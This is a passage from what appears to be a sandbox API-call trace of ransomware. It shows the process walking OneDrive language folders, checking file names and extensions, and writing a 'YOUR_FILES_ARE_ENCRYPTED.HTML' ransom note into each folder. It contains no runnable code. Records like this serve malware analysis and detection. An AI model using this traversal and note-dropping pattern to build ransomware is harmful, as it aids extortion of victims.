(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\gl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.551] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.553] CloseHandle (hObject=0x5bc) returned 1 [0160.554] GetProcessHeap () returned 0x270000 [0160.554] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.554] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa09b690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa23e5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa23e5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="gu", cAlternateFileName="")) returned 1 [0160.554] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu") returned 74 [0160.555] GetProcessHeap () returned 0x270000 [0160.555] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.555] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu" [0160.555] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu\\*" [0160.555] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa09b690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa23e5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa23e5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.556] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa09b690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa23e5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa23e5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.556] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa23e5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa23e5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa23e5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.556] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.556] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.556] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.556] lstrlenW (lpString=".mui") returned 4 [0160.556] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.556] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa23e5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa23e5b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa23e5b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.556] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.556] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\gu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.557] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.559] CloseHandle (hObject=0x5bc) returned 1 [0160.559] GetProcessHeap () returned 0x270000 [0160.560] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.560] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa23e5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4538f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4538f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ha-latn-ng", cAlternateFileName="HA-LAT~1")) returned 1 [0160.560] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng") returned 82 [0160.560] GetProcessHeap () returned 0x270000 [0160.560] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.560] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng" [0160.560] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng\\*" [0160.560] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa23e5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4538f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4538f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.561] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa23e5b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4538f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4538f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.561] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4538f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4538f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4538f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.561] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui") returned 118 [0160.561] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.561] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.562] lstrlenW (lpString=".mui") returned 4 [0160.562] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.562] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4538f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa4538f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa4538f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.562] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.562] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0160.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ha-latn-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ha-latn-ng\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.562] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.564] CloseHandle (hObject=0x5bc) returned 1 [0160.565] GetProcessHeap () returned 0x270000 [0160.565] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.565] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa4538f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa5f6810, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa5f6810, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="he", cAlternateFileName="")) returned 1 [0160.565] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he") returned 74 [0160.565] GetProcessHeap () returned 0x270000 [0160.565] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.565] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he" [0160.565] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he\\*" [0160.566] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa4538f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa5f6810, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa5f6810, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.566] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa4538f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa5f6810, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa5f6810, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.566] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa5f6810, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa5f6810, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa5f6810, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x102a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.567] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.567] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.567] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.567] lstrlenW (lpString=".mui") returned 4 [0160.567] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.567] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa5f6810, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa5f6810, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa5f6810, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x102a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.567] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.567] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\he\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\he\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.568] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.570] CloseHandle (hObject=0x5bc) returned 1 [0160.570] GetProcessHeap () returned 0x270000 [0160.571] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.571] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa5f6810, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa799730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa799730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="hi", cAlternateFileName="")) returned 1 [0160.571] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi") returned 74 [0160.571] GetProcessHeap () returned 0x270000 [0160.571] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.571] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi" [0160.571] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi\\*" [0160.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa5f6810, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa799730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa799730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.433] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa5f6810, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa799730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa799730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.434] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa799730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa799730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa799730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.434] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.434] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.434] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.434] lstrlenW (lpString=".mui") returned 4 [0161.434] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.434] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa799730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa799730, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa799730, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.434] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.434] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\hi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0161.435] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.437] CloseHandle (hObject=0x594) returned 1 [0161.438] GetProcessHeap () returned 0x270000 [0161.438] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.439] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa799730, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9fad30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9fad30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="hr", cAlternateFileName="")) returned 1 [0161.439] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\hr") returned 74 [0161.439] GetProcessHeap () returned 0x270000 [0161.439] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.439] lstrcpyW (in: lpString1=0x74d2010, 